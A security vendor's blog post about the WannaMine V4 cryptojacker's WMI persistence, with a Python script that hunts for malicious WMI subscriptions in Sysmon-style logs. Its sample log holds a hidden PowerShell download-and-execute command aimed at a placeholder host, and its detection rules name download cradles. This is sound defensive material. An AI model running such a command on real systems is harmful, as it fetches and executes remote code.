Cryptojacking is a type of malware attack where threat actors use hijacked devices to illegally mine cryptocurrency. It is widely considered to be among the least invasive cyber security threats. That is because the goal of a cryptojacker is to remain hidden on the system for as long as possible, thus maximizing the value they extract from the target.
This belief is not only false but dangerous. Cryptojacking malware usually arrives through unpatched servers or weak Remote Desktop Protocol (RDP) credentials, which much-dreaded ransomware groups can exploit just as easily as cryptocurrency criminals do.
WannaMine V4, an active cryptojacker, was recently detected and stopped by Minerva Labs. In the attack we detected, the threat actors used WMI persistence to execute malicious PowerShell scripts that download code and execute it in memory. Attackers frequently use in-memory techniques to bypass traditional anti-virus products.
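WMI event subscriptions of the kind described above leave a footprint that defenders can hunt for: the subscription consists of an `__EventFilter` (the WQL trigger), a consumer such as `CommandLineEventConsumer` (what runs), and a `__FilterToConsumerBinding` joining them, and Sysmon records their creation as Event IDs 19, 20 and 21. The script below is an added example written for this post, not Minerva's code and not data from the incident: it runs a small rule set over constructed, flattened Sysmon-style lines and scores command-line consumers that launch PowerShell with download-and-execute indicators, as well as filters that poll a performance-counter class as a timer. The field names follow Sysmon, but the log format, the subscription names and the `.invalid` URL are all constructed.

```python
"""Score constructed Sysmon-style WMI subscription events (IDs 19 and 20) for
PowerShell download-and-execute persistence.

Added example: not Minerva's code, not incident data. Field names follow Sysmon's
WmiEventFilter/WmiEventConsumer events, flattened here to key="value" pairs.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input. Names and the .invalid URL are placeholders.
SAMPLE_LOG = r'''
EventID="20" Operation="Created" User="NT AUTHORITY\SYSTEM" Name="Sample Consumer A" Type="Command Line" Destination="powershell.exe -NoP -NonI -W Hidden -Exec Bypass -C IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"
EventID="20" Operation="Created" User="CORP\backupadm" Name="NightlyBackup" Type="Command Line" Destination="C:\Tools\backup.exe --full"
EventID="20" Operation="Created" User="NT AUTHORITY\SYSTEM" Name="Sample Consumer B" Type="Active Script" Destination="C:\Windows\System32\wbem\scrcons.exe"
EventID="19" Operation="Created" User="NT AUTHORITY\SYSTEM" Name="Sample Filter A" Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
'''

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# (regex, weight, reason). Weights are local tuning knobs, not a standard.
CONSUMER_RULES = [
    (re.compile(r"\b(powershell(\.exe)?|pwsh(\.exe)?)\b", re.I), 2, "launches PowerShell"),
    (re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 3, "Invoke-Expression of fetched content"),
    (re.compile(r"\b(DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|IWR|Net\.WebClient)\b", re.I), 3, "download cradle"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), 2, "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-(nop|noprofile)\b", re.I), 1, "profile bypass"),
    (re.compile(r"-(ex|exec|executionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
]

# A filter that polls a clock or perf-counter class fires on a schedule with no
# user involvement, which is how WMI subscriptions are turned into timers.
FILTER_RULES = [
    (re.compile(r"__InstanceModificationEvent\s+WITHIN\s+\d+", re.I), 2, "polling filter (WITHIN) acts as a timer"),
    (re.compile(r"Win32_PerfFormattedData|Win32_LocalTime|Win32_UTCTime", re.I), 2, "triggers on clock/perf counter change"),
]


@dataclass
class Finding:
    event_id: str
    name: str
    score: int
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Turn one key="value" line into a dict; None for blank lines."""
    line = line.strip()
    if not line:
        return None
    return dict(FIELD_RE.findall(line))


def score_event(ev):
    """Apply the rule set for the event type; the returned score may be 0."""
    if ev.get("EventID") == "20" and ev.get("Type") == "Command Line":
        rules, text = CONSUMER_RULES, ev.get("Destination", "")
    elif ev.get("EventID") == "19":
        rules, text = FILTER_RULES, ev.get("Query", "")
    else:
        rules, text = [], ""
    finding = Finding(ev.get("EventID", "?"), ev.get("Name", "?"), 0)
    for rx, weight, reason in rules:
        if rx.search(text):
            finding.score += weight
            finding.reasons.append(reason)
    return finding


def hunt(log_text, threshold=4):
    """Return findings at or above threshold, highest score first."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev:
            finding = score_event(ev)
            if finding.score >= threshold:
                findings.append(finding)
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f.score:>2}] Event {f.event_id} {f.name!r}: " + "; ".join(f.reasons))
```

On the constructed input the PowerShell consumer scores 11 and the polling filter scores 4, while the backup job and the script consumer fall below the threshold. In a real hunt, join flagged filters and consumers through the Event ID 21 binding records (or `Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding` on the host) so that a filter and its consumer are assessed as one persistence mechanism rather than two isolated hits.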
The decoded PowerShell script:
The events of the Crypto malware as depicted by Minerva’s platform:
Domain names & IPs:
If you think your organization may have been the victim of a cryptojacking attack, or want to learn more about Minerva Labs' anti-ransomware protection solutions, contact us.